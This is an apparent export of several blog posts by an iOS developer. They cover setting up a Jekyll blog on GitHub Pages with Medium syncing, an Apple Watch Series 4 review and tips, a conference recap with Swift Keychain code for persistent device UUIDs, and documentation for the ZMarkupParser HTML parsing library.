+ active: disqus # The global switch for posts comments, e.g., 'disqus'. Keep it empty means disable
+ # The active options are as follows:
+ disqus:
+ shortname: zhgchgli # fill with the Disqus shortname. › https://help.disqus.com/en/articles/1717111-what-s-a-shortname
+ # utterances settings › https://utteranc.es/
+ utterances:
+ repo: # <gh-username>/<repo>
+ issue_term: # < url | pathname | title | ...>
+ # Giscus options › https://giscus.app
+ giscus:
+ repo: # <gh-username>/<repo>
+ repo_id:
+ category:
+ category_id:
+ mapping: # optional, default to 'pathname'
+ input_position: # optional, default to 'bottom'
+ lang: # optional, default to the value of `site.lang`
+
+# Self-hosted static assets, optional › https://github.com/cotes2020/chirpy-static-assets
+assets:
+ self_host:
+ enabled: # boolean, keep empty means false
+ # specify the Jekyll environment, empty means both
+ # only works if `assets.self_host.enabled` is 'true'
+ env: # [development|production]
+
+paginate: 10
+
+# ------------ The following options are not recommended to be modified ------------------
+
+kramdown:
+ syntax_highlighter: rouge
+ syntax_highlighter_opts: # Rouge Options › https://github.com/jneen/rouge#full-options
+ css_class: highlight
+ # default_lang: console
+ span:
+ line_numbers: false
+ block:
+ line_numbers: true
+ start_line: 1
+
+collections:
+ tabs:
+ output: true
+ sort_by: order
+
+defaults:
+ - scope:
+ path: '' # An empty string here means all files in the project
+ type: posts
+ values:
+ layout: post
+ comments: true # Enable comments in posts.
+ toc: true # Display TOC column in posts.
+ # DO NOT modify the following parameter unless you are confident enough
+ # to update the code of all other post links in this project.
+ permalink: /posts/:title/
+ - scope:
+ path: _drafts
+ values:
+ comments: false
+ - scope:
+ path: ''
+ type: tabs # see `site.collections`
+ values:
+ layout: page
+ permalink: /:title/
+ - scope:
+ path: assets/img/favicons
+ values:
+ swcache: true
+ - scope:
+ path: assets/js/dist
+ values:
+ swcache: true
+
+sass:
+ style: compressed
+
+compress_html:
+ clippings: all
+ comments: all
+ endings: all
+ profile: false
+ blanklines: false
+ ignore:
+ envs: [development]
+
+exclude:
+ - '*.gem'
+ - '*.gemspec'
+ - tools
+ - README.md
+ - LICENSE
+ - gulpfile.js
+ - node_modules
+ - package*.json
+
+jekyll-archives:
+ enabled: [categories, tags]
+ layouts:
+ category: category
+ tag: tag
+ permalinks:
+ tag: /tags/:name/
+ category: /categories/:name/
+
Please replace the settings according to the comments.
⚠️ _config.yml needs to be restarted after any adjustments to apply the changes.
After the dependencies are installed,
you can start the local website with bundle exec jekyll s
:
Copy the URL http://127.0.0.1:4000/
and paste it into your browser to open it.
Local preview successful!
As long as this Terminal is open, the local website will be running. The Terminal will continuously update the website access logs, which is convenient for debugging.
We can open a new Terminal for other subsequent operations.
Depending on the template, there may be different folders and configuration files. The article directory is:
YYYY
– MM
– DD
- article-file-name
.mdOther directories like _includes, _layouts, _sites, _tabs… allow you to make advanced customizations.
Jekyll uses Liquid as the page template engine. The page template is composed in a manner similar to inheritance:
Users can freely customize pages. The engine will first check if the user has created a corresponding custom file for the page -> if not, it will check if the template has one -> if not, it will use the original Jekyll style.
So we can easily customize any page by creating a file with the same name in the corresponding directory!
_posts/
directory.Use Visual Code (free) or Typora (paid) to create Markdown files. Here we use Visual Code as an example:
YYYY
– MM
– DD
- article-file-name
.mdArticle Content Top Meta:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
---
+layout: post
+title: "Hello"
+description: ZhgChgLi's first article
+date: 2022-07-16 10:03:36 +0800
+categories: Jekyll Life
+author: ZhgChgLi
+tags: [ios]
+---
+
Jekyll Life
-> Life directory under Jekyll)Article Content:
Write using Markdown format:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
---
+layout: post
+title: "Hello"
+description: ZhgChgLi's first article
+date: 2022-07-16 10:03:36 +0800
+categories: Jekyll Life
+author: ZhgChgLi
+tags: [ios]
+---
+# HiHi!
+Hello there
+I am **ZhgChgLi**
+Image:
+
+> _If you have any questions or comments, feel free to [contact me](https://www.zhgchg.li/contact) ._
+
Results:
⚠️ Adjusting the article does not require restarting the website. The file changes will be rendered and displayed directly. If the modified content does not appear after a while, it may be due to an error in the article format causing rendering failure. You can check the Terminal for the reason.
With basic knowledge of Jekyll, we move forward by using the ZMediumToMarkdown tool to download existing articles from Medium and convert them to Markdown format to place in our Blog folder.
cd to the blog directory and run the following command to download all articles from the specified Medium user:
1
+
ZMediumToMarkdown -j your Medium account
+
Wait for all articles to download…
If you encounter any download issues or unexpected errors, feel free to contact me. This downloader was written by me (development insights), and I can help you solve the problem quickly and directly.
After the download is complete, you can preview the results on the local website.
Done!! We have seamlessly imported Medium articles into Jekyll!
You can check if the articles are formatted correctly and if there are any missing images. If there are any issues, feel free to report them to me for assistance in fixing them.
After confirming that the local preview content is correct, we need to push the content to the Github Repo.
Use the following Git commands in sequence:
1
+2
+3
+
git add .
+git commit -m "update post"
+git push
+
After pushing, go back to Github, and you will see that Actions are running CD:
Wait about 5 minutes…
Deployment completed!
After the initial deployment, you need to change the following settings:
Otherwise, when you visit the website, you will only see:
1
+
--- layout: home # Index page ---
+
After clicking “Save,” it will not take effect immediately. You need to go back to the “Actions” page and wait for the deployment again.
After redeployment is complete, you can successfully access the website:
Demo -> zhgchg.li
Now you also have a free Jekyll personal blog!!
Every time you push content to the Repo, it will trigger a redeployment. You need to wait for the deployment to succeed for the changes to take effect.
If you don’t like the zhgchgli0718.github.io Github URL, you can purchase a domain you like from Namecheap or register a free .tk domain from Dot.tk.
After purchasing the domain, go to the domain backend:
Add the following four Type A Record records
1
+2
+3
+4
+
A Record @ 185.199.108.153
+A Record @ 185.199.109.153
+A Record @ 185.199.110.153
+A Record @ 185.199.111.153
+
After adding the settings in the domain backend, go back to Github Repo Settings:
In the Custom domain section, enter your domain, and then click “Save”.
After the DNS is connected, you can replace the original github.io address with zhgchg.li.
⚠️ DNS settings take at least 5 minutes ~ 72 hours to take effect. If it cannot be verified, please try again later.
Every time there is a new article, you have to manually run ZMediumToMarkdown on your computer and then push it to the project. Is it troublesome?
ZMediumToMarkdown actually also provides a convenient Github Action feature that allows you to free up your computer and automatically synchronize Medium articles to your website.
Go to the Actions settings of the Repo:
Click “New workflow”
Click “set up a workflow yourself”
ZMediumToMarkdown.yml
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
name: ZMediumToMarkdown
+on:
+ workflow_dispatch:
+ schedule:
+ - cron: "10 1 15 * *" # At 01:10 on day-of-month 15.
+
+jobs:
+ ZMediumToMarkdown:
+ runs-on: ubuntu-latest
+ steps:
+ - name: ZMediumToMarkdown Automatic Bot
+ uses: ZhgChgLi/ZMediumToMarkdown@main
+ with:
+ command: '-j your Medium account'
+
Click the top right “Start commit” -> “Commit new file”
Complete the creation of Github Action.
After creation, go back to Actions and you will see the ZMediumToMarkdown Action.
In addition to automatic execution at the scheduled time, you can also manually trigger execution by following these steps:
Actions -> ZMediumToMarkdown -> Run workflow -> Run workflow.
After execution, ZMediumToMarkdown will directly run the script to synchronize Medium articles to the Repo through Github Action’s machine:
After running, it will trigger a redeployment. Once the redeployment is complete, the latest content will appear on the website. 🚀
No manual operation required! This means you can continue to update Medium articles in the future, and the script will automatically help you sync the content from the cloud to your own website!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Why buy it? Is it useful? What’s good about it? How to use it? & WatchOS APP recommendations
First, let me share my background with Apple products. I am not a die-hard Apple fan; my first encounter was in 2015 when I bought an iPhone 6 with my part-time job salary. Due to work needs, I started using a MacOS computer (Mac Mini) last year and bought my own MacBook Pro this year, and switched to an iPhone 8. The reasons I stepped into the Apple ecosystem are nothing more than:
[Updated 2019–05–02]: Another addition to the Apple family, AirPods 2 (Unboxing and Hands-on Experience Click Here)
Considering the above factors, I began to choose a suitable Apple Watch; excluding the strap material, there are three versions of the body to choose from:
I personally bought 2. Aluminum case + possibly scratchable glass surface + GPS + Cellular 44 mm
There are two sizes, 40mm and 44mm. Choose based on your wrist size; too large may not fit well, and heart rate detection may be inaccurate; too small may look odd.
Left 44mm/Right 40mm (Thanks to a colleague for the support)
If you can’t find something to compare, you can use a disposable contact lens case, approximately 44mm (actual measurement 44.5mm)
Here is a picture of my wrist for reference. If you are still unsure about the size, it’s best to visit a store and try it on (I initially aimed for 40mm, but found it too small after trying it on).
*Apple Watch 3 38mm and Apple Watch 4 40mm have the same size and interchangeable straps *Apple Watch 3 42mm and Apple Watch 4 44mm have the same size and interchangeable straps
There are two options: aluminum case + possibly scratchable glass surface and stainless steel case + sapphire crystal glass. If budget allows, the latter is recommended; due to budget constraints, I chose the former. Why choose the stainless steel case + sapphire crystal glass version?
Although the body is heavier (you might feel it during exercise), it is easier to match with outfits in daily life. A leather or metal strap paired with a stainless steel body can complement business attire for a more consistent aesthetic. Switching to a sports strap for casual or athletic activities maintains elegance and versatility!
The sapphire crystal glass is extremely hard, so you don’t have to worry about scratches on the watch face. (Personal experience: My previous iPhone 6 was used without a case for over a year. I didn’t particularly protect it, just kept it in my pocket or on the table, and the screen got scratched up. However, the camera lens, which uses sapphire crystal glass, remained pristine.)
But I bought the regular version… If you search online for articles about Apple Watch screen protectors, you’ll find two camps: one supports using a screen protector to prevent scratches, and the other opposes it, arguing that it’s a matter of usage habits and that the watch isn’t so fragile. Do you see Rolex watches with screen protectors? Or, if you’re a laid-back user who just wants to use the watch as a consumable product, you won’t have this concern.
Personally, I have a bit of OCD and would be annoyed by scratches, so I support using a screen protector. Usage habits? I think only bumping into things is a bad habit; daily dust damage is hard to prevent.
If you also want to use a screen protector, here’s a suggestion: “Spend a bit more money to have someone apply it for you.” I usually apply screen protectors to my phone myself, so why do I recommend having someone else apply it for the Apple Watch?
This part was very frustrating for me. First, I bought a tempered glass protector from Tokyo* on Pchome ($399). It was a hard film with adhesive only on the edges, leaving a hollow space in the middle, making touch sensitivity very poor (seriously, did the manufacturer not test this?). So I removed it shortly after applying it.
The second attempt was with a g*r soft film ($100 for two pieces), which had full adhesive and adhered well, but it was difficult to apply without bubbles. I tried both pieces, but there were still some bubbles that were very noticeable, and it wasn’t oleophobic or hydrophobic, making it uncomfortable to use.
Finally, I spent $990 to have someone apply an h*a jelly adhesive glass protector (x豪包膜). It adhered well, had no bubbles, covered the entire screen, and was oleophobic and hydrophobic.
If you still want to try applying a screen protector yourself, look for a hydrogel film.
The feel after applying the screen protector is not as good as the original (personally, I rate it about 97 out of 100), and the screen will be slightly raised. It’s a personal choice!
Stainless steel version (thanks to my colleague for the support)
So, if your budget allows, I still recommend upgrading to the stainless steel version.
Screen protectors are prone to chipping at the edges. Without a protective case, my screen protectors usually get damaged within a month, costing $990 each time. I’ve replaced three so far, which is frustrating. Since using a protective case, it’s been four months, and the screen protector is still intact!
I recommend “at least using a bumper case,” any brand will do.
My painful lesson is that I wish I had known about protective cases earlier. It would have saved me a lot of money!
I’m on the fence about this. I personally bought the cellular version so I wouldn’t need to carry my phone while running. Considering I plan to use it for 2-3 years and don’t know what the future holds, I decided to upgrade. However, if your budget is limited and you don’t go out without your phone, you can just buy the WiFi version (price difference is $3600). Consider the following points:
Last week (2018/11/11), I went to 101 but couldn’t find the model I wanted, so I ordered online from China. I placed the order on 11/11, it shipped on 11/12, and it arrived on 11/15 as scheduled:
When I received it, I was so excited that I opened it right away without recording the process. You can refer to the unboxing videos online: Apple Watch Series 4 Experience Full-Screen Watch, Is It You? ? (Mainland China) 、 Apple Watch Series 4 Complete Unboxing! Three Features Are Super Impressive 感 (Taiwan)
Supplementary Unboxing Picture
The unboxing part ends here…
Pairing and basic settings won’t be elaborated here; you can refer to the unboxing articles above. Here, we assume you have already set up and started using your Apple Watch.
Button Diagram — Apple Official Support Center
“Digital Crown” = “Digital Crown” “Side Button” = “Side Button”
Button Operations:
This is important, so it’s placed first. How to take a screenshot on Apple Watch: Open the “Watch” app on your “iPhone” -> “My Watch” tab -> go to “General” -> “Enable Screenshots” and turn it on.
On the Apple Watch, press the Digital Crown and the Side Button simultaneously. When the screen flashes, the screenshot is taken. You can then find the screenshot in the Photos app on your iPhone!
The built-in speaker on the watch can only be used for calls and playing alert sounds, not for playing music. If you feel uncomfortable talking on the watch in public, you can use Bluetooth earphones.
Please refer to the official document
The watch uses Bluetooth when near the phone and WiFi when the distance is too far.
Left indicates disconnected, right indicates connected
By default, the watch mirrors the notification settings of the apps on the iPhone. You can also specifically turn off notifications for certain apps so they don’t get sent to the watch (open the “Watch” app on your “iPhone” -> “My Watch” tab -> “Notifications” -> scroll to the bottom to adjust for each app).
Feel free to play around and place whatever you think is important or looks good; I put “information I always want to know when I look at my watch” on the watch face, and you can also add multiple watch faces for switching.
You read that right, Apple Watch also has a flashlight; pull up the menu from the bottom of the watch face page to find the “Flashlight” button, and you can swipe left or right to change the screen color; yes, it’s just a high-brightness screen color!
What’s special is that there is also a strobe mode:
Making night activities safer!
“Silent Mode” - All notifications are silent, no vibration, no screen lighting, only shown in the notification center.
“Theater Mode” - Raising the wrist will not wake the screen, you need to tap the screen to wake it.
“Water Lock” - Locks the screen touch, you need to turn the digital crown to unlock, and the speaker will automatically play sound to expel water after unlocking.
“Airplane Mode” - Turns off all external connections.
“Power Reserve Mode” - Really saves power! Only the time display function remains when pressing the digital crown, everything else is turned off, almost like being off; to exit Power Reserve Mode, press and hold the side button (same as turning on).
In all these modes, alarms and countdown functions will still sound (Power Reserve Mode will force the device to turn on).
Just raise your wrist, and after the screen lights up, you can directly speak to use Siri! No need to say “Hey! Siri” (e.g., after raising your wrist, directly say “Tomorrow’s weather”). You can also use Siri when your phone is at a distance (e.g., when hanging clothes).
[2019-05-02 Update]: For an even better Siri experience, refer to AirPods 2 Unboxing and Hands-on Experience for the Siri section. With AirPods 2, you can use Siri directly with the headphones on, without even raising your wrist.
The built-in AQI seems not to support the Taiwan region. You need to search for “Air Matters” in the “App Store”, download and install it, then open it. After that, go to the watch face design complications section and select “Air Matters”.
If it keeps failing to enable, first ensure your Apple ID has Two-Factor Authentication enabled (not Two-Step Verification) or try restarting your computer!
p.s. My company’s Mac Mini couldn’t enable it until I restarted it.
By default, it shows favorites from your iPhone. Open “Photos” on your iPhone, tap the “heart” on the photos you want to transfer to your watch, and they will appear.
Activity records have three rings and three goals daily:
For details, check the “Health” APP on your iPhone for a detailed explanation.
Daily achievement records will prompt, and you can also press hard on the “Activity” APP on Apple Watch to adjust activity goal values (default is 360 active calories per day).
Physical training part: For running, I use Nike Run Club + instead of the built-in one. Last week, I went cycling and tried the built-in physical training -> “Outdoor Cycling” to record. It records altitude/distance/time/path/heart rate. Awesome!
Currently, it only supports Apple Map, Google Map is not supported yet. Open “Maps” to search or select the company or home address set in personal information (Source: Contacts -> My Card) or contact information or manually input the destination. After starting navigation, each turn is a card that automatically flips based on movement. You can rotate to view, and click to see the map content. When there are 40 meters left, it will vibrate to alert you. Press hard to end navigation.
This part just transfers your phone’s Apple Map information to the watch (when the watch is navigating, the phone’s navigation will also automatically open).
Actual usage experience: Apple Map has very few landmarks and is hard to search. It seems to only guide main roads. Even though there are dual lanes, faster, and no traffic routes, it doesn’t guide… So still looking forward to Google Map updates. For now, just use this as a temporary solution.
Here is a Siri shortcut: Open Google Map item using Apple Map
Open “Camera” on Apple Watch, and the phone’s camera will also open. You can use the watch to control the phone’s camera for taking photos and videos. Press hard to switch lenses/settings.
On the watch face page, swipe up from the bottom to find a “phone vibrating icon.” Click it, and the phone will make a sound!
p.s. The reverse function (finding the watch with the phone) is not available. If lost, please use “Find iPhone” to locate it.
I think this is a bug…
In messages, press hard on the “microphone” or “handwriting” icon to bring up the menu > “Select Language” -> “Chinese”
Another method is to open “iPhone” -> “Settings” -> “General” -> “Keyboard” -> “Dictation” -> “Dictation Languages” -> check only “Mandarin”
This way, your voice input will only understand Mandarin, and the phone part will also be affected.
Open the “Watch” APP on “iPhone” -> “My Watch” page -> Breathe -> Turn off Breathe reminders
Open the “Watch” APP on “iPhone” -> “My Watch” page -> Activity -> Turn off Stand reminders
Open the “Watch” APP on “iPhone” -> “My Watch” page -> Passcode -> Simple Passcode -> Turn off -> then you can set a 6-digit passcode
No.
Compared to a colleague’s Apple Watch S3, the S4 opens apps almost without loading, and it boots up quickly. You can refer to this video for actual tests: 【Latest】4th Generation Apple Watch Series 4 Speed Test Volume Comparison
I only wear it from waking up to before showering, not while sleeping (afraid of hitting the wall unconsciously). I take it off to charge before showering.
Wearing it for about 15 hours a day, if not playing with it constantly, about 65% battery left. It can last, barely needing a charge every two days.
*The first charge may take longer. *Battery performance may not be optimal in the first few days, causing higher consumption.
Air Matters (Free): Supports watch face complications for AQI information.
秒速記帳 ($60): Fast accounting software, supports dial complications. I have tried this and C*Money, but C*Money costs $120 and the interface is too complicated for me to use. So I recommend this one.
Bus+ (Free): Bus information query. I originally used Taipei Bus but that app does not support Apple Watch, so I had to give it up. Bus+ works differently from Taipei Bus; Bus+ is station-based. My personal setup is to categorize frequently used locations (home/company/MRT station) and add the bus routes that pass through.
Bus+
Nike+ Run Club (Free): Running record app.
Shazam (Free): Press to identify music (although you can also ask Siri directly). There is another app called SoundHound, but in my personal tests, Shazam is faster.
雙北市Ubike+ (Free): Check the number of available and parking spots at nearby/favorite Ubike stations.
錄音機 (Free): Quickly use Apple Watch to record and transfer to your phone.
倒數日 (Free): View countdowns for anniversaries/future events.
Advanced Calculator For Apple Watch OS (Free): Use a small calculator on Apple Watch.
Line, Spotify…etc.
I’ve been wearing it for almost two weeks now. From the initial excitement to now, it has seamlessly integrated into my life. So far, the benefits to my daily life include: unlocking my MAC without typing a long password (company policy requires logging out when leaving the desk), checking the weather instantly, navigation, app notifications, and monitoring heart rate for health. That’s about it; there are too few supported apps and functions.
Has the time spent on my phone decreased? Not particularly, because I still prefer to reply to notifications on my phone. Replying on the watch requires voice input, which is awkward in public, or handwriting, which is very slow. Moreover, many apps do not support Apple Watch.
Is it really worth starting at $12,900? There are many better options for watches over $10,000, but if you want to integrate with the Apple ecosystem, there’s only one choice. If you just want to buy a luxury watch, you don’t need an Apple Watch. If you want a watch that can handle daily tasks, you can consider it. If you want a luxury item + daily task handler, you can consider the stainless steel or even Hermès version!
Since purchasing, I’ve had thoughts of returning it. Spending $17,500 on a watch seems not worth it, but it does help with daily life. Is this help worth $17,500? I don’t think so at the moment. I’ll reevaluate when the Apple Watch app ecosystem is more developed. For now, it’s a luxury item XD, bought for pleasure, trendiness, and impulse.
Other items are for you to experience on your own.
-
Please see the next article » AirPods 2 Unboxing and Hands-on Experience
Please see Let’s Make an Apple Watch App! (Swift)
Please see First Experience with Smart Home — Apple HomeKit & Xiaomi Mijia
For details, please see this article
nomad Apple Watch Strap
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
iPlayground 2018 Recap & All About UUID
Last Saturday and Sunday, I attended the iPlayground Apple software developer conference. This event was recommended by a colleague, and I wasn’t familiar with it before attending.
Over the two days, the event and schedule were smooth, and the agenda included:
The Bicycle Project left a deep impression. Using an iPhone as a sensor to detect bicycle pedal rotation, the presenter switched slides while riding a bicycle on stage (the main goal was to create an open-source version of Zwift, sharing many pitfalls such as Client/Server communication, latency issues, and magnetic interference).
Decaying Dirty Code; it resonated deeply, bringing a knowing smile. Technical debt accumulates this way: rushed development schedules lead to quick but poorly structured solutions, and subsequent developers don’t have time to refactor, causing the debt to pile up. Eventually, the only solution might be to start over.
Testing (Design Patterns in XCUITest) by a senior from KKBOX was very open, sharing their methods, code examples, encountered issues, and solutions. This session was particularly beneficial for our work. Testing is an area I’ve always wanted to strengthen, and now I can study it thoroughly.
Listening to the Lighting Talk made me want to share too 😂. I’ll prepare better next time!
The official party afterward was sincere, with great food and drinks. Listening to the seniors’ heartfelt words was both relaxing and informative, enhancing many soft skills.
NTU Backstage Cafe
I learned that this was the first edition, and I was truly honored to participate. Kudos to all the staff and speakers!
The purpose of attending conferences is to: broaden horizons, absorb new knowledge, understand the ecosystem, and explore areas you wouldn’t normally encounter, and deepen expertise, by identifying any overlooked aspects or discovering new methods in familiar areas.
I took many notes to study and savor later.
After the conference, I immediately applied what I learned to our app. This session was led by senior Zonble, who has been writing from iPhone OS 2 to iOS 12, which is impressive. I started from iOS 11/Swift 4, so I missed the turbulent times when Apple changed APIs.
It’s reasonable that UUIDs went from accessible to restricted. If used for good purposes: identifying user devices, advertising, or third-party operations, it can be beneficial. But if misused, it can track and profile users (e.g., knowing you often travel, have kids, and live in Taipei based on installed apps like travel, Taipei bus, BMW, and baby care apps). Combined with personal data entered in apps, the potential misuse is concerning.
However, this also affects many legitimate users. Using UUIDs for user data decryption keys or device identification is significantly impacted. I admire the engineers of that era; the impact would have caused complaints from bosses and users, requiring quick alternative solutions.
This article focuses on obtaining UUIDs to identify unique devices. For alternatives to knowing which apps a user has installed, consider these keywords: UIPasteboard pasteboardWithName: create: (using the clipboard to share between apps), canOpenURL: info.plist LSApplicationQueriesSchemes (using canOpenURL to check if an app is installed, listing up to 50 entries in info.plist)
1
+
let DEVICE_UUID:String = UIDevice.current.identifierForVendor?.uuidString ?? UUID().uuidString
+
Note: When all apps from the same vendor are removed and then reinstalled, a new UUID will be generated ( if both com.518.work and com.518.job are deleted, and then com.518.work is reinstalled, a new UUID will be generated ) Similarly, if you have only one app, deleting and reinstalling it will generate a new UUID
Due to this characteristic, our company’s other apps use Key-Chain to solve this problem. After listening to the advice of experienced speakers, we have verified that this approach is correct!
The process is as follows:
When the Key-Chain UUID field has a value, retrieve it; otherwise, get the UUID value of IDFA and write it back
Key-Chain writing method:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
if let data = DEVICE_UUID.data(using: .utf8) {
+ let query = [
+ kSecClass as String : kSecClassGenericPassword as String,
+ kSecAttrAccount as String : "DEVICE_UUID",
+ kSecValueData as String : data ] as [String : Any]
+
+ SecItemDelete(query as CFDictionary)
+ SecItemAdd(query as CFDictionary, nil)
+}
+
Key-Chain reading method:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
let query = [
+ kSecClass as String : kSecClassGenericPassword,
+ kSecAttrAccount as String : "DEVICE_UUID",
+ kSecReturnData as String : kCFBooleanTrue,
+ kSecMatchLimit as String : kSecMatchLimitOne ] as [String : Any]
+
+var dataTypeRef: AnyObject? = nil
+let status: OSStatus = SecItemCopyMatching(query as CFDictionary, &dataTypeRef)
+if status == noErr,let dataTypeRef = dataTypeRef as? Data,let uuid = String(data:dataTypeRef, encoding: .utf8) {
+ //uuid
+}
+
If you find Key-Chain operations too cumbersome, you can encapsulate them yourself or use third-party libraries.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+
let DEVICE_UUID:String = {
+ let query = [
+ kSecClass as String : kSecClassGenericPassword,
+ kSecAttrAccount as String : "DEVICE_UUID",
+ kSecReturnData as String : kCFBooleanTrue,
+ kSecMatchLimit as String : kSecMatchLimitOne ] as [String : Any]
+
+ var dataTypeRef: AnyObject? = nil
+ let status: OSStatus = SecItemCopyMatching(query as CFDictionary, &dataTypeRef)
+ if status == noErr,let dataTypeRef = dataTypeRef as? Data,let uuid = String(data:dataTypeRef, encoding: .utf8) {
+ return uuid
+ } else {
+ let DEVICE_UUID:String = UIDevice.current.identifierForVendor?.uuidString ?? UUID().uuidString
+ if let data = DEVICE_UUID.data(using: .utf8) {
+ let query = [
+ kSecClass as String : kSecClassGenericPassword as String,
+ kSecAttrAccount as String : "DEVICE_UUID",
+ kSecValueData as String : data ] as [String : Any]
+
+ SecItemDelete(query as CFDictionary)
+ SecItemAdd(query as CFDictionary, nil)
+ }
+ return DEVICE_UUID
+ }
+}()
+
Because I need to reference it in other Extension Targets, I directly wrapped it into a closure parameter for use.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Convert HTML String to NSAttributedString with corresponding Key style settings
<br>
-> <br/>
<b>Bold<i>Bold+Italic</b>Italic</i>
-> <b>Bold<i>Bold+Italic</i></b><i>Italic</i>
<Congratulation!>
-> <Congratulation!>
(treat as String)<b></b>
-> weight: .semibold & underline: 1
<zhgchgli></zhgchgli>
into desired stylesstyle
HTML Attribute HTML can specify text styles from the style attribute, and this tool also supports style specifications from style
e.g. <b style=”font-size: 20px”></b>
-> bold + font size 20 px
<img>
images, <ul>
lists, <table>
tables, etc.NSAttributedString.DocumentType.html
*Additionally, NSAttributedString.DocumentType.html
crashes with strings longer than 54,600+ characters (EXC_BAD_ACCESS).
You can directly download the project, open ZMarkupParser.xcworkspace
, select the ZMarkupParser-Demo
target, and Build & Run to test the effects.
Supports SPM/Cocoapods, please refer to the Readme.
MarkupStyle/MarkupStyleColor/MarkupStyleParagraphStyle, corresponding to the encapsulation of NSAttributedString.Key.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+
var font: MarkupStyleFont
+var paragraphStyle: MarkupStyleParagraphStyle
+var foregroundColor: MarkupStyleColor? = nil
+var backgroundColor: MarkupStyleColor? = nil
+var ligature: NSNumber? = nil
+var kern: NSNumber? = nil
+var tracking: NSNumber? = nil
+var strikethroughStyle: NSUnderlineStyle? = nil
+var underlineStyle: NSUnderlineStyle? = nil
+var strokeColor: MarkupStyleColor? = nil
+var strokeWidth: NSNumber? = nil
+var shadow: NSShadow? = nil
+var textEffect: String? = nil
+var attachment: NSTextAttachment? = nil
+var link: URL? = nil
+var baselineOffset: NSNumber? = nil
+var underlineColor: MarkupStyleColor? = nil
+var strikethroughColor: MarkupStyleColor? = nil
+var obliqueness: NSNumber? = nil
+var expansion: NSNumber? = nil
+var writingDirection: NSNumber? = nil
+var verticalGlyphForm: NSNumber? = nil
+...
+
You can declare the styles you want to apply to the corresponding HTML tags:
1
+
let myStyle = MarkupStyle(font: MarkupStyleFont(size: 13), backgroundColor: MarkupStyleColor(name: .aquamarine))
+
Declare the HTML tags to be rendered and the corresponding Markup Style. The currently predefined HTML tag names are as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+
A_HTMLTagName(), // <a></a>
+B_HTMLTagName(), // <b></b>
+BR_HTMLTagName(), // <br></br>
+DIV_HTMLTagName(), // <div></div>
+HR_HTMLTagName(), // <hr></hr>
+I_HTMLTagName(), // <i></i>
+LI_HTMLTagName(), // <li></li>
+OL_HTMLTagName(), // <ol></ol>
+P_HTMLTagName(), // <p></p>
+SPAN_HTMLTagName(), // <span></span>
+STRONG_HTMLTagName(), // <strong></strong>
+U_HTMLTagName(), // <u></u>
+UL_HTMLTagName(), // <ul></ul>
+DEL_HTMLTagName(), // <del></del>
+IMG_HTMLTagName(handler: ZNSTextAttachmentHandler), // <img> and image downloader
+TR_HTMLTagName(), // <tr>
+TD_HTMLTagName(), // <td>
+TH_HTMLTagName(), // <th>
+...and more
+...
+
This way, when parsing the <a>
Tag, it will apply the specified MarkupStyle.
Extend HTMLTagName:
1
+
let zhgchgli = ExtendTagName("zhgchgli")
+
As mentioned earlier, HTML supports specifying styles from the Style Attribute. Here, it is abstracted to specify supported styles and extensions. The currently predefined HTML Style Attributes are as follows:
1
+2
+3
+4
+5
+6
+7
+
ColorHTMLTagStyleAttribute(), // color
+BackgroundColorHTMLTagStyleAttribute(), // background-color
+FontSizeHTMLTagStyleAttribute(), // font-size
+FontWeightHTMLTagStyleAttribute(), // font-weight
+LineHeightHTMLTagStyleAttribute(), // line-height
+WordSpacingHTMLTagStyleAttribute(), // word-spacing
+...
+
Extend Style Attribute:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
ExtendHTMLTagStyleAttribute(styleName: "text-decoration", render: { value in
+ var newStyle = MarkupStyle()
+ if value == "underline" {
+ newStyle.underline = NSUnderlineStyle.single
+ } else {
+ // ...
+ }
+ return newStyle
+})
+
1
+2
+3
+
import ZMarkupParser
+
+let parser = ZHTMLParserBuilder.initWithDefault().set(rootStyle: MarkupStyle(font: MarkupStyleFont(size: 13)).build()
+
initWithDefault
will automatically add predefined HTML Tag Names & default corresponding MarkupStyles as well as predefined Style Attributes.
set(rootStyle:)
can specify the default style for the entire string, or it can be left unspecified.
1
+2
+
let parser = ZHTMLParserBuilder.initWithDefault().add(ExtendTagName("zhgchgli"), withCustomStyle: MarkupStyle(backgroundColor: MarkupStyleColor(name: .aquamarine))).build() // will use markupstyle you specify to render extend html tag <zhgchgli></zhgchgli>
+let parser = ZHTMLParserBuilder.initWithDefault().add(B_HTMLTagName(), withCustomStyle: MarkupStyle(font: MarkupStyleFont(size: 18, weight: .style(.semibold)))).build() // will use markupstyle you specify to render <b></b> instead of default bold markup style
+
1
+2
+3
+4
+5
+6
+
let attributedString = parser.render(htmlString) // NSAttributedString
+
+// work with UITextView
+textView.setHtmlString(htmlString)
+// work with UILabel
+label.setHtmlString(htmlString)
+
1
+
parser.stripper(htmlString)
+
1
+2
+3
+4
+5
+6
+7
+
let selector = parser.selector(htmlString) // HTMLSelector e.g. input: <a><b>Test</b>Link</a>
+selector.first("a")?.first("b").attributedString // will return Test
+selector.filter("a").attributedString // will return Test Link
+
+// render from selector result
+let selector = parser.selector(htmlString) // HTMLSelector e.g. input: <a><b>Test</b>Link</a>
+parser.render(selector.first("a")?.first("b"))
+
Additionally, if you need to render long strings, you can use the async method to prevent UI blocking.
1
+2
+3
+
parser.render(String) { _ in }...
+parser.stripper(String) { _ in }...
+parser.selector(String) { _ in }...
+
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Catalyst Apple Watch Ultra-Thin Waterproof Case & Muvit Apple Watch Case
Thanks to Men’s Game for providing the Apple Watch Series 4 case for testing.
